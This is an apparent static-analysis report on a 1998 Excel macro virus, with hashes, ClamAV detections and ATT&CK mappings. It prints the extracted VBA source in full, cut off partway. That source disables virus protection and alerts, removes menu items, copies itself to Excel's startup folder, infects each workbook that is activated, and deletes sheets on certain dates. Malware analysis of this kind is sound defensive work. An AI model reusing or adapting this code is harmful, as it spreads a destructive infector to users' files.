Win.Trojan.Pivis-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 d9a693b36a1197e9…

MALICIOUS

Office (OLE)

Size: 35.5 KB
Created: 1998-05-12 13:27:10
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: c2a7e8e2b9579d8d2dc256355364357d
SHA-1: 57d24107f139b7c64ef2a4ae65bca162d3ff41d2
SHA-256: d9a693b36a1197e9c5d3fc8cba5ec60e57e98235b3df9a557182008841c4206f
Risk score: 220

Malware Insights

Win.Trojan.Pivis-2 · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The file is an Excel document containing VBA macros, including an Auto_Open macro, a common technique for executing malicious code as soon as the document is opened. The script attempts to save a file named 'FUCKPOL.XLM' to the Excel startup path, indicating likely downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Xls.Trojan.Neg-4' further support its malicious nature.

Heuristics (4)

  • ClamAV: Win.Trojan.Pivis-2 (severity: critical, tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected (severity: medium, 2 related findings, tag: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, tag: OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (severity: high, tag: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5451 bytes
SHA-256: a1e8b706d069ac185db2876655105c9e8dadeeaa13d29d14aa1b588b87e8b3c7
Detection: ClamAV: Xls.Trojan.Neg-4
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Police"


Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
CommandBars("tools").Controls("Macro").Delete
CommandBars("tools").Controls("Customize...").Delete
CommandBars("view").Controls("Toolbars").Delete
CommandBars("view").Controls("Status Bar").Delete
CommandBars("window").Controls("Unhide...").Delete
If spy() Then
    GoTo shotme:
Else
    fire
End If
shotme:
Application.OnSheetActivate = "FUCKPOL.XLM!action"
bye:
Call effect
End Sub

Function spy() As Boolean
Attribute spy.VB_ProcData.VB_Invoke_Func = " \n14"
spy = False
For x = 1 To Application.Workbooks.Count
    If Application.Workbooks(x).Name = "FUCKPOL.XLM" Then
    For y = 1 To Application.Workbooks("FUCKPOL.XLM").Modules.Count
        If Application.Workbooks("FUCKPOL.XLM").Modules(y).Name = "Police" Then
            spy = True
        End If
    Next y
    End If
Next x
End Function

Function fire()
Attribute fire.VB_ProcData.VB_Invoke_Func = " \n14"
  activebook = ActiveWorkbook.Name
  Workbooks(activebook).SaveCopyAs Application.StartupPath + "\FUCKPOL.XLM"
  Workbooks.Open (Application.StartupPath + "\FUCKPOL.XLM")
  Windows("FUCKPOL.XLM").Visible = False
 Application.Workbooks("FUCKPOL.XLM").Save
End Function

Function statusme() As Boolean
Attribute statusme.VB_ProcData.VB_Invoke_Func = " \n14"
activebook = ActiveWorkbook.Name
statusme = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
    If Application.Workbooks(activebook).Modules(y).Name = "Police" Then
            statusme = True
   End If
Next y
End Function

Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"
    oactivebook = ActiveWorkbook.Name
    If statusme() Then
    GoTo bye2
    Else
    End If
    Application.ScreenUpdating = False
    Application.Windows("FUCKPOL.XLM").Visible = True
    Workbooks("FUCKPOL.XLM").Activate
    Sheets("Police").Visible = True
    Workbooks("FUCKPOL.XLM").Sheets("Police").Copy Before:=Workbooks(oactivebook).Sheets(1)
    Workbooks(oactivebook).Sheets("Police").Visible = False
    Workbooks("FUCKPOL.XLM").Sheets("Police").Visible = False
    Windows("FUCKPOL.XLM").Visible = False
bye2:
Close
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo bye3
Application.DisplayAlerts = False
Application.Workbooks("FUCKPOL.XLM").Save
Application.ActiveWorkbook.Save
bye3:
End Sub

Sub effect()
Attribute effect.VB_ProcData.VB_Invoke_Func = " \n14"
If Application.UserName = "foxz" And Application.OrganizationName = "NoMercyVirusTeam" Then
GoTo boss
Else
End If
  If Day(Date) = "13" Or Day(Date) = "1" Or Day(Date) = "31" Then
  ActiveWindow.SelectedSheets.Delete
  Assistant.Visible = True
  With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Six students of Universitas Trisakti, Jakarta, died from bullets fired by security personnel during an action of concern staged by thousands of students at the campus of Universitas Trisakti, Grogol, West Jakarta, on Tuesday (12/5). The six students were shot while on campus by a flurry of bullets, suspected to be fired by security troops on the Grogol fly-over. Dozens of other students suffered serious and minor injuries."
    .Heading = "XM97.Fucking Police"
    .Animation = msoAnimationEmptyTrash
    .Show
  End With
  Assistant.Visible = False
  Assistant.Visible = True
  With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Until this report was prepared, around 200 students were still waiting in the corridors of the Sumber Waras Hospital, guarding their fellow-students still being treated in the Emergency Unit, as well as the remains of their colleagues laying in state. A moving atmosphere prevailed around t
... (truncated)